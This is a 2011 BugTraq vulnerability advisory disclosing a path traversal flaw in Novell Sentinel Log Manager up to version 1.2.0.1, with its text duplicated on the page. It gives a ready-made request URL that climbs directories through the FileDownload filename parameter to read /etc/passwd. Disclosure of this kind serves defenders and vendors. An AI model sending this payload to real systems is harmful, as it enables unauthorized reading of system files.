BugTraq
Back to list
|
Post reply
Novell Sentinel Log Manager <=1.2.0.1 Path Traversal
Dec 18 2011 03:25PM
Andrea Fabrizi (andrea fabrizi gmail com)
**************************************************************
Vuln: Path Traversal
Application: Sentinel Log Manager
Vendor: Novell
Version affected: <= 1.2.0.1
Website: http://www.novell.com/products/sentinel-log-manager/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi (at) gmail (dot) com [email concealed]
Web: http://www.andreafabrizi.it
**************************************************************
The latest version of Sentinel Log Manager is prone to a Directory
Traversal, which makes it possible, for Authenticated Users, to access
any system file.
Testing environment: Sentinel Log Manager Appliance 1.2.0.1
Vulnerable URL:
/novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rd
party/tomcat/temp/../../../../../../etc/passwd
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Vuln: Path Traversal
Application: Sentinel Log Manager
Vendor: Novell
Version affected: <= 1.2.0.1
Website: http://www.novell.com/products/sentinel-log-manager/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi (at) gmail (dot) com [email concealed]
Web: http://www.andreafabrizi.it
**************************************************************
The latest version of Sentinel Log Manager is prone to a Directory
Traversal, which makes it possible, for Authenticated Users, to access
any system file.
Testing environment: Sentinel Log Manager Appliance 1.2.0.1
Vulnerable URL:
/novelllogmanager/FileDownload?filename=/opt/novell/sentinel_log_mgr/3rd
party/tomcat/temp/../../../../../../etc/passwd
[ reply ]